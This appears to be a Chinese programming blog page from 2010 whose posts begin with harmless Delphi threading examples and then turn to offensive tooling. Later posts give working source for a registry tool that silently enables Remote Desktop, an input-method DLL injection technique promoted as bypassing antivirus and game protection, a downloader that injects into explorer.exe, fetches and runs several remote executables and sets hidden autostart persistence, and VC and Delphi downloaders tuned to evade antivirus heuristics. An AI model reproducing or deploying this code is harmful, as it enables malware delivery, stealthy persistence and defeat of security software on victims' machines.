心动吧DELPHI网络书

delphi判断线程是否正在运行

a63248388@163.com (kissjetg) — Tue, 18 May 2010 04:10:57 +0800

//以下资料来自大富翁论坛。

/判断线程是否释放

//返回值：0-已释放；1-正在运行；2-已终止但未释放；

//3-未建立或不存在

function TFrmMain.CheckThreadFreed(aThread: TThread): Byte; 
var 
 i: DWord; 
 IsQuit: Boolean; 
begin 
 if Assigned(aThread) then 
 begin 
   IsQuit := GetExitCodeThread(aThread.Handle, i); 
   if IsQuit then           //If the function succeeds, the return value is nonzero. 
                                 //If the function fails, the return value is zero. 
   begin 
     if i = STILL_ACTIVE then    //If the specified thread has not terminated, 
                                 //the termination status returned is STILL_ACTIVE. 
       Result := 1 
     else 
       Result := 2;              //aThread未Free，因为Tthread.Destroy中有执行语句 
   end 
   else 
     Result := 0;                //可以用GetLastError取得错误代码 
 end 
 else 
   Result := 3; 
end;

继续阅读《delphi判断线程是否正在运行》的全文内容...

多线程: 不使用同步工具, 手动协调线程依次执行 (2010-5-18 4:6:41)

delphi 关闭线程函数 (2009-3-24 3:17:51)

多线程同步之 WaitableTimer (等待定时器对象)-多类型理解 (2009-2-19 11:42:37)

WaitForSingleObject大致理解 (2009-2-18 10:3:4)

13多线程同步之 Event (事件对象) (2009-2-17 7:58:35)

多线程: 不使用同步工具, 手动协调线程依次执行

a63248388@163.com (kissjetg) — Tue, 18 May 2010 04:06:41 +0800

在前面例子的基础上, 探讨新问题.

假如我们想让几个线程(例子中是 3 个)依次执行, 我们可以使用临界区、信号、互斥等手段;

但下面第一个例子什么同步工具都没用, 也达到了目的; 方法是: 让前一个线程在结束前顺便启动下一个线程.

第二个例子使用了互斥对象配合 WaitForSingleObject 函数, 也达到相似的目的.

效果图(两个例子的效果图差不多, 但第二个例子的执行顺序不好保证):

第一个例子的代码文件:

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    PaintBox1: TPaintBox;
    PaintBox2: TPaintBox;
    PaintBox3: TPaintBox;
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

const
  colors: array[0..2] of TColor = (clRed, clGreen, clBlue);
var
  hArr: array[0..2] of THandle;
  panitArr: array[0..2] of TPaintBox;

function ThreadFun(p: Pointer): Integer; stdcall;
var
  i,n,x1,y1,x2,y2: Integer;
  ThreadID: DWORD;
begin
  n := Integer(p);
  panitArr[n].Color := colors[n];

  for i := 0 to 50 do with panitArr[n] do
  begin
    x1 := Random(Width); y1 := Random(Height);
    x2 := Random(Width); y2 := Random(Height);
    Canvas.Lock;
    Canvas.Ellipse(x1,y1,x2,y2);
    Canvas.Unlock;
    Sleep(2);
  end;

  {在前一个线程收尾时, 如果新建线程不超过 3 个就继续建立}
  Inc(n);
  if n < 3 then hArr[n] := CreateThread(nil, 0, @ThreadFun, Ptr(n), 0, ThreadID);
  Result := 0;
end;

procedure TForm1.Button1Click(Sender: TObject);
var
  ID: DWORD;
begin
  panitArr[0] := PaintBox1;
  panitArr[1] := PaintBox2;
  panitArr[2] := PaintBox3;

  {开始只建立了一个线程, 并传入 0 参数作为标识}
  hArr[0] := CreateThread(nil, 0, @ThreadFun, Ptr(0), 0, ID);
end;

procedure TForm1.FormDestroy(Sender: TObject);
var
  i: Integer;
begin
  for i := 0 to Length(hArr) - 1 do CloseHandle(hArr[i]);
end;

end.

窗体文件:

object Form1: TForm1
  Left = 0
  Top = 0
  Caption = 'Form1'
  ClientHeight = 156
  ClientWidth = 321
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'Tahoma'
  Font.Style = []
  OldCreateOrder = False
  OnDestroy = FormDestroy
  PixelsPerInch = 96
  TextHeight = 13
  object PaintBox1: TPaintBox
    Left = 8
    Top = 8
    Width = 97
    Height = 113
  end
  object PaintBox2: TPaintBox
    Left = 111
    Top = 8
    Width = 98
    Height = 113
  end
  object PaintBox3: TPaintBox
    Left = 215
    Top = 8
    Width = 98
    Height = 113
  end
  object Button1: TButton
    Left = 238
    Top = 126
    Width = 75
    Height = 25
    Caption = 'Button1'
    TabOrder = 0
    OnClick = Button1Click
  end
end

第一个例子的代码文件(窗体同上):

unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls, ExtCtrls;

type
  TForm1 = class(TForm)
    PaintBox1: TPaintBox;
    PaintBox2: TPaintBox;
    PaintBox3: TPaintBox;
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

const
  colors: array[0..2] of TColor = (clRed, clGreen, clBlue);
var
  hArr: array[0..2] of THandle;
  panitArr: array[0..2] of TPaintBox;
  hMutex: THandle; {互斥对象的句柄}

function ThreadFun(p: Pointer): Integer; stdcall;
var
  i,n,x1,y1,x2,y2: Integer;
begin
  n := Integer(p);
  panitArr[n].Color := colors[n];

  if WaitForSingleObject(hMutex, INFINITE) = WAIT_OBJECT_0 then
  begin
    for i := 0 to 50 do with panitArr[n] do
    begin
      x1 := Random(Width); y1 := Random(Height);
      x2 := Random(Width); y2 := Random(Height);
      Canvas.Lock;
      Canvas.Ellipse(x1,y1,x2,y2);
      Canvas.Unlock;
      Sleep(10);
    end;
    ReleaseMutex(hMutex);
  end;
  Result := 0;
end;

procedure TForm1.Button1Click(Sender: TObject);
var
  ID: DWORD;
  i: Integer;
begin
  panitArr[0] := PaintBox1;
  panitArr[1] := PaintBox2;
  panitArr[2] := PaintBox3;

  CloseHandle(hMutex);
  hMutex := CreateMutex(nil, False, nil);
  for i := 0 to Length(hArr) - 1 do
    hArr[i] := CreateThread(nil, 0, @ThreadFun, Ptr(i), 0, ID);
end;

procedure TForm1.FormDestroy(Sender: TObject);
var
  i: Integer;
begin
  CloseHandle(hMutex);
  for i := 0 to Length(hArr) - 1 do CloseHandle(hArr[i]);
end;

end.

继续阅读《多线程: 不使用同步工具, 手动协调线程依次执行》的全文内容...

delphi判断线程是否正在运行 (2010-5-18 4:10:57)

delphi 关闭线程函数 (2009-3-24 3:17:51)

多线程同步之 WaitableTimer (等待定时器对象)-多类型理解 (2009-2-19 11:42:37)

WaitForSingleObject大致理解 (2009-2-18 10:3:4)

13多线程同步之 Event (事件对象) (2009-2-17 7:58:35)

XP/2003下Delphi最简单的方法开放3389

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:52:58 +0800

program Open3389;

{$APPTYPE CONSOLE}

uses
  SysUtils, Registry, Windows;

var
reg:TRegistry;

procedure Help;
begin
  writeln();
  writeln(======Win XP&2003 Open3389 by lanyu====== );
  Writeln(Useag +ExtractFileName(Paramstr(0))+ [/n]);
end;

begin
  { TODO -oUser -cConsole Main : Insert code here }
  if ParamCount>2 then
  begin
    help;
    exit;
  end;
  reg:=TRegistry.Create;
  reg.RootKey:=HKEY_LOCAL_MACHINE;
  reg.OpenKey(SYSTEM\CurrentControlSet\Control\Terminal Server,true);
  if ParamCount=1 then
  begin
  if Paramstr(1)=/n then
  begin
    try
      reg.WriteBool(fDenyTSConnections,true);
      Writeln(Close 3389 successfully);
    except
      Writeln(Close 3389 fail);
    end;
  end
  else
    begin
      Help;
      Exit;
    end;
  end
  else
  begin
    try
      reg.WriteBool(fDenyTSConnections,false);
      writeln(Open 3389 successfully);
    except
      writeln(Open 3389 fail);
    end;
  end;
  reg.Free;

end.

继续阅读《XP/2003下Delphi最简单的方法开放3389》的全文内容...

找不到相关文章，请发表流言

Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:47:03 +0800

Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）

注入DLL是做全局钩子或者拦截类软件都有可能用到的技术，如果做外挂的话我们也有可能需要注入一个DLL到游戏进程中去干点什么“坏事”。但我们知道现在要注入DLL是越来越难了。场景1：制作火星文输入法外挂，原理是利用API HOOK拦截并修改输入法相关函数，需要注入一个DLL到所有进程中，但是后来发现，在开启了瑞星的帐号保险箱后，用户将不能在QQ中输入火星文。原因是瑞星保护了QQ进程，禁止对其注入DLL，解决方法是提示用户关闭帐号保险箱 -_-| 确实是很降低用户体验的一个不是办法的办法。场景2：制作某游戏外挂，需要注入一个DLL到游戏进程中去直接调用游戏函数完成某一功能。结果发现该游戏有NP保护，OpenProcess打不开，创建远程线程也不行，试用其它方法也一一失败。遇到上面的情况，高手们自然是转到Ring0下面去，使用驱动之类的办法来对付啦，不过吾等菜鸟可就是酒井没法子了 -_-|

不过也别太灰心，凡事总会有办法的。我想我们需要一种持久的、稳定的、不容易被安全软件屏蔽的DLL注入方法，后来发现，输入法程序就是能完成这一任务的理想人选。输入法程序程序到底是什么？它没有自己的进程，并且在系统还没有登录时就已被加载（在欢迎界面你也可以调出输入法），它可以在游戏中打开，也可以在控制台程序中打开，还可以在瑞星保护下的QQ中打开，在杀软中也可以打开，这不就是我们要找的特性吗。那么，输入法到底是什么呢？根据Windows的规定，输入法其实就是一个DLL，不过它是一个特殊的DLL，它必须具有标准输入法程序所规定的那些接口，输入法是由输入法管理器（imm32.dll）控制的，输入法管理器又是由user32.dll控制的。输入法在系统目录是以IME为扩展名的文件，当在应用程序中激活某个输入法时，输入法管理器就会在那个应用程序的进程中加载对应的IME文件，注意，加载IME文件跟加载普通的DLL并没有本质区别，所以，可以认为，输入法其实就是注入到应用程序中的一个DLL文件，并且，这种“注入”是不会被杀软和游戏NP拦截的（至少目前是）。现在，我们已经有了一个注入DLL的另类方法，那就是利用输入法。具体流程是这样，首先制作一个标准输入法文件，但是这个输入法并不完成文字输入工作，它的唯一任务就是用来注入DLL，所以称为“服务输入法”，然后，制作一个控制程序，来控制服务输入法，当然最后还需要一个用于注入的目标DLL，这样一共就有3个文件。开始工作后，控制程序首先将服务输入法安装到系统中，然后传递几个参数给服务输入法，参数中包括了需要注入的DLL文件的名称和路径，然后，控制程序将服务输入法设置为系统的默认输入法，这样新的程序一打开，服务输入法就会注入那个程序。当然，在服务输入法安装之前打开的程序不会被注入，这时需要向系统中的所有窗口POST一条WM_INPUTLANGCHANGEREQUEST消息，该消息可以在指定窗口中后台激活服务输入法，这样，系统中所有拥有窗口的进程就都被我们的服务输入法注入了。服务输入法注入程序之后，就会根据控制程序传递过来的参数加载目标DLL，这样目标DLL也就随着服务输入法一同注入到目标程序中了。注意服务输入法是控制程序用WM_INPUTLANGCHANGEREQUEST消息在所有窗口中自动激活的，如果某个窗口自动激活失败，你就需要在那个窗口中手工切换到服务输入法，这样才能注入进去了。至于注入以后，你就可以在窗口中切换到别的输入法，这并不会影响已经注入进去的DLL。我将这一套功能制作成一个完整的示例，你可以在以下地址下载： http://www.pen88.com/download/imehook.rar 压缩包中的第6个和第8个文件夹演示了此功能并包含所有源代码。其中文件imedllhost09.dll就是服务输入法，运行时会被安装到系统中，控制程序退出时会自动卸载该输入法，这样用户就不太容易察觉，你还可以重新编译该输入法，将名称改为“中文（中国）”，这样隐蔽性更好。文件hxwdllwx.dll是演示用的目标DLL，你可以替换成自己的DLL，然后那个exe文件就是控制程序了。输入法imedllhost09.dll在运行时会被复制到系统目录并更名为imedllhost09.ime，它导出了2个函数用于控制。在VB中的声明为：

Public Declare Function IMESetPubString Lib "imedllhost09.ime" (ByVal RunDLLStr As String, ByVal UnloadDll As Long, ByVal loadNextIme As Long, ByVal DllData1 As Long, ByVal DllData2 As Long, ByVal DllData3 As Long) As Long

Public Declare Function IMEClearPubString Lib "imedllhost09.ime" () As Long

其中IMESetPubString用于向输入法传递要注入的DLL等参数。RunDLLStr，要注入的DLL命令和完整路径。UnloadDll，当输入法退出时，是否同时卸载目标DLL 0-是，1-否。loadNextIme，当切换至该服务输入法时，是否直接切换到下一个输入法（这样服务输入法就好像被跳过了，可最小限度影响用户的输入法顺序） 0-否，1-是。DllData1，DllData2，DllData3是传递给目标DLL的回调函数（函数名称必须为RunDllHostCallBack）的参数，你可以在目标DLL中导出一个函数，名称为RunDllHostCallBack，这样当输入法注入时会调用目标DLL的该回调函数并向其传递这3个参数。函数原型为（VC）：

DWORD RunDllHostCallBack(DWORD calldata1, DWORD calldata2,DWORD calldata3);

IMEClearPubString函数用于清除输入法的配置，清除后，输入法将停止在新的程序中注入目标DLL，但已注入的DLL不会卸载。

好了，利用输入法来注入DLL基本上就是这样了，详细的用法大家可以看压缩包中的第8个文件夹，其中服务输入法是VC写的，控制程序是VB的，代码都是有注释的。测试发现该方法能过目前所有杀软，也能注入冰刃。当然缺点还是有的，就是目标程序如果不接受输入法那就没办法了，但是现在一般的游戏都不会禁止玩家在里面打字吧，而且杀软也不能禁止用户输入汉字吧，哈哈，所以通用性应该还是蛮好的。

最后，我再介绍另一个注入DLL的方法，估计也很少被用到。是利用一个未公开函数RegisterUserApiHook，可以在网上搜索关键词“RegisterUserApiHook”，查到有人在Windows 2003下测试成功，但是我在Windows XP测试却失败。后来终于找到了失效的原因。RegisterUserApiHook函数可以在系统中注册一个全局钩子，你需要在钩子中指定一个DLL和一个回调函数，然后，所有加载了user32.dll的程序就都会在启动时加载你指定的这个DLL。用这个函数来注入DLL也是很不错的。但是测试发现它的注入能力似乎赶不上上面提到的利用输入法来注入的办法，可以注入一般的程序和某些安全程序，但是对冰刃无效。而且它有一个限制，就是系统中只能同时存在一个这样的钩子。实际上这个钩子平时是被系统中的Themes服务占用了，Themes服务正是利用这个钩子HOOK了绘制窗口的相关API，所以才让所有程序窗口变成XP主题样式的。所以我们要用这个钩子的话，必须先关闭Themes服务，这样在XP下也可以用了，但是这样系统就变成Windows 2000的样式了 -_-|

RegisterUserApiHook函数的VB声明如下：

Public Declare Function RegisterUserApiHookXP Lib "user32" Alias "RegisterUserApiHook" (ByVal hInstance As Long, ByVal fnUserApis As Long) As Long

Public Declare Function RegisterUserApiHook2003 Lib "user32" Alias "RegisterUserApiHook" (pRegInfo As HookAPIRegInfo2003) As Long

可以看到，在XP和2003下这个函数的参数是不一样的。关于此函数的示例代码，请参见压缩包中的第5个文件夹。

最后的最后，再介绍一个未公开函数InitializeLpkHooks，这个函数在网上能找到的资料更少，只有一个声明而已。但是它名称中最后那个“Hooks”误导了我，我以为又是一个可以用来注入DLL的不错函数，用OD反出来一看，原来只是个局部HOOK而已。虽然没太大用，还是一并写上吧，也许谁用得着呢。InitializeLpkHooks顾名思义就是HOOK LPK的，Windows有个lpk.dll，就是支持多语言包的那么个功能。测试发现好多程序在TextOut之前似乎是要调用lpk.dll里面的相关函数的，可能是支持多语言的程序就需要用这个来判断到底要显示那种语言吧。而InitializeLpkHooks，就是用来HOOK lpk.dll里面的4个函数的，这4个函数是LpkTabbedTextOut，LpkPSMTextOut，LpkDrawTextEx，LpkEditControl。我们先打开VB，在窗体中加入以下代码吧：

Private Sub Form_Load()

DLLhwnd = LoadLibrary("lpk.dll") '加载DLL

DLLFunDre = GetProcAddress(DLLhwnd, "LpkDrawTextEx") '获取回调函数地址

LpkHooksInfo.lpHookProc_LpkTabbedTextOut = 0

LpkHooksInfo.lpHookProc_LpkPSMTextOut = 0

LpkHooksInfo.lpHookProc_LpkDrawTextEx = GetLocalProcAdress(AddressOf HookProc1) '设置要HOOK的LPK函数

LpkHooksInfo.lpHookProc_LpkEditControl = 0

InitializeLpkHooks LpkHooksInfo

End Sub

Private Sub Form_Unload(Cancel As Integer)

LpkHooksInfo.lpHookProc_LpkTabbedTextOut = 0

LpkHooksInfo.lpHookProc_LpkPSMTextOut = 0

LpkHooksInfo.lpHookProc_LpkDrawTextEx = DLLFunDre

LpkHooksInfo.lpHookProc_LpkEditControl = 0

InitializeLpkHooks LpkHooksInfo

FreeLibrary DLLhwnd

End Sub

然后新建一个模块，在模块中加入以下代码：

Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long

Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long

Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long

' ----------------未公开函数--------------------------------------

Public Declare Sub InitializeLpkHooks Lib "user32" (lpProcType As Any)

Type LpkHooksSetting

    lpHookProc_LpkTabbedTextOut As Long

    lpHookProc_LpkPSMTextOut As Long

    lpHookProc_LpkDrawTextEx As Long

    lpHookProc_LpkEditControl As Long

End Type

' -------------------------------

Public DLLhwnd As Long, DLLFunDre As Long

Public LpkHooksInfo As LpkHooksSetting

Public Function GetLocalProcAdress(ByVal lpProc As Long) As Long

GetLocalProcAdress = lpProc

End Function

Function HookProc1(ByVal a1 As Long, ByVal a2 As Long, ByVal a3 As Long, ByVal a4 As Long, ByVal a5 As Long, ByVal a6 As Long, ByVal a7 As Long, ByVal a8 As Long, ByVal a9 As Long, ByVal a10 As Long) As Long

HookProc1 = 0

End Function

运行一下看看，是不是窗体中标题栏和按钮上的文字都没有了，因为我们把函数LpkDrawTextEx替换成自己的函数HookProc1了。这个函数有10个参数，其中几个好像是字符串指针，似乎可以用来截获窗体要显示的文字，然后改成另一种语言的文字，我猜想，也许就是这个用途吧。哈哈，纯属猜测。以上就是函数InitializeLpkHooks的用法了。

以上就是全部。

下载地址:201005180350093144.rar

内容为:

1-火星文输入法外挂（仅拦截并修改输入法，使用WM_DEBUG钩子，对控制台程序也有效，稳定性一般）

2-拦截并修改输入法+拦截但不修改键盘消息（使用WH_KEYBOARD钩子，对控制台程序无效，稳定性最佳）

3-拦截并修改输入法和键盘消息（使用WH_GETMESSAGE钩子，可以修改按键）

4-拦截输入法输入和IME消息（使用WH_CALLWNDPROC钩子）

5-拦截并修改输入法（使用未公开函数RegisterUserApiHook）【新】

6-拦截并修改输入法（利用IME输入法向所有进程注入DLL，可绕过大多数安全软件检测，比如瑞星的账号保险箱）【新】

7-补充示例（演示拦截WM_CHAR消息时如何处理中文，可获得万能五笔输入）

8-补充示例：利用输入法注入任意DLL演示（可绕过大多数安全软件的检测，能够注入带有自我保护的进程）

继续阅读《Ring3下注入DLL的另类方法，能过杀软和游戏NP（源码）》的全文内容...

找不到相关文章，请发表流言

ActiveX启动下载者（delphi）

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:43:25 +0800

program InjectTheSelf;

{$IMAGEBASE $13140000}

uses
Windows;

var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;


//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);

end;

//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin

vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;

procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('unlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://x1xxxxxxxxxxxxxxxxxxxx                         ','C:\WINDOWS\Temp\system1.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system1.exe',nil,nil,5);

Downfile(nil,'http://x2xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system2.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system2.exe',nil,nil,5);

Downfile(nil,'http://x3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system3.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system3.exe',nil,nil,5);

Downfile(nil,'http://x4xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system4.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system4.exe',nil,nil,5);

Downfile(nil,'http://x5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system5.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x6xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system6.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system6.exe',nil,nil,5);

Downfile(nil,'http://x7xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system7.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system5.exe',nil,nil,5);

Downfile(nil,'http://x8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system8.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system8.exe',nil,nil,5);

Downfile(nil,'http://x9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\system9.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\system9.exe',nil,nil,5);

Downfile(nil,'http://xAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemA.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemA.exe',nil,nil,5);

Downfile(nil,'http://xBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          ','C:\WINDOWS\Temp\systemB.exe', 0, nil);
ShellRun(0,'open','C:\WINDOWS\Temp\systemB.exe',nil,nil,5);


ExitProcess(0);
end;

procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID); 
end;

procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;

begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;


BEGIN

CopyFile('C:\windows\system32\urlmon.dll','C:\windows\system32\unlmon.dll',true) ;
copyfile(pchar(paramstr(0)),pchar('C:\Program Files\Internet Explorer\iede.exe'),true);
SetFileAttributes( 'C:\Program Files\Internet Explorer\iede.exe',
FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM );//设置文件系统隐藏属性
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{926A036A-158B-047A-E269-D148B0369C14}','StubPath','C:\Program Files\Internet Explorer\iede.exe');
RunInject(0); //这里改为 ：1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.

继续阅读《ActiveX启动下载者（delphi）》的全文内容...

找不到相关文章，请发表流言

最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:38:58 +0800

VC版本：

#pragma comment(lib, "urlmon.lib")
#include
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
#pragma comment(linker,"/ENTRY:Simen /MERGE:.rdata=.text /MERGE:.data=.text")

int DownExeTest()
{
char strPath[MAX_PATH];
HANDLE hMutex = NULL;
hMutex = CreateMutex(NULL, FALSE, "TestC");
if (hMutex != NULL)
{
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
{
URLDownloadToFile(0, "http://127.0.0.1/1.exe", "C:\\aaa.exe", 0, 0);
WinExec("C:\\aaa.exe", SW_SHOW);
ExitProcess(-1);
}
}
else
{
GetModuleFileName(GetModuleHandle(NULL), strPath, sizeof(strPath));
WinExec(strPath, SW_HIDE);
ExitProcess(-1);
}
}
return 0;
}
/*
int DownExe()
{
URLDownloadToFile(0, "http://127.0.0.1/1.exe", "C:\\aaa.exe", 0, 0);
WinExec("C:\\aaa.exe", SW_SHOW);
ExitProcess(-1);
return 0;
}
*/
int Simen()
{
//DownExe(); //没有处理的 被杀..
DownExeTest(); //处理的 免杀..
return 0;

Delphi版本:

program Main;
uses
Windows,
Urlmon;
procedure DownExeTest();
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, 'TestD');
if MutexHandle <> 0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
URLDownloadToFile(nil, 'http://127.0.0.1/1.exe', 'c:\test.exe', 0, nil);
WinExec('c:\test.exe', SW_SHOW);
end else
begin
WinExec(pchar(paramstr(0)),SW_HIDE);
end;
end;
end;

{
procedure DownExe();
begin
URLDownloadToFile(nil, 'http://127.0.0.1/1.exe', 'c:\test.exe', 0, nil);
WinExec('c:\test.exe', SW_SHOW);
end;
}

begin
// DownExe(); //没有处理的 被杀..
DownExeTest(); //处理的 免杀..
end.

}

继续阅读《最简单的下载者过NOD32 卡巴等启发[VC Delphi两个版本]》的全文内容...

打造无DLL版穿墙Downloader (2009-1-20 6:49:53)

用Delphi实现文件下载的几种方法 (2009-1-20 6:14:51)

未命名文章

a63248388@163.com (kissjetg) — Tue, 18 May 2010 03:29:45 +0800

原理是以独占的方式打开文件，再把文件句柄复制到另一个程序中去，达到本程序退出后目标文件仍被打开的目的

program createfile;  
uses  
  Windows, SysUtils;  
//提权函数  
procedure SetPrivilege;  
var  
  TPPrev, TP: TTokenPrivileges;  
  TokenHandle: THandle;  
  dwRetLen: DWORD;  
  lpLuid: TLargeInteger;  
begin  
  OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);  
  if (LookupPrivilegeValue(nil, ’SeDebugPrivilege’, lpLuid)) then  
  begin  
    TP.PrivilegeCount := 1;  
    TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;  
    TP.Privileges[0].Luid := lpLuid;  
    AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);  
  end;  
  CloseHandle(TokenHandle);  
end;  
procedure OccupyFile(lpFileName: string);  
var  
  hProcess, hFile, hTargetHandle: thandle;  
begin  
　//打开一个pid为４的进程，只要是存在的进程，都可以  
  hProcess := OpenProcess(PROCESS_DUP_HANDLE, FALSE, 4);  
  if (hProcess = 0) then exit;  
  //以独占模式打开目标文件  
  hFile := CreateFileA(PChar(lpFileName), GENERIC_READ, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);  
  if (hFile = INVALID_HANDLE_VALUE) then  
  begin  
    CloseHandle(hProcess);  
    exit;  
  end;  
  //把文件句柄复制到pid=4的进程中去，这样，只要pid=4的进程不退出，谁也动不了目标文件  
  DuplicateHandle(GetCurrentProcess(), hFile, hProcess, @hTargetHandle, 0, FALSE, DUPLICATE_SAME_ACCESS or DUPLICATE_CLOSE_SOURCE);  
  CloseHandle(hProcess);    
end;  
begin  
  SetPrivilege;  
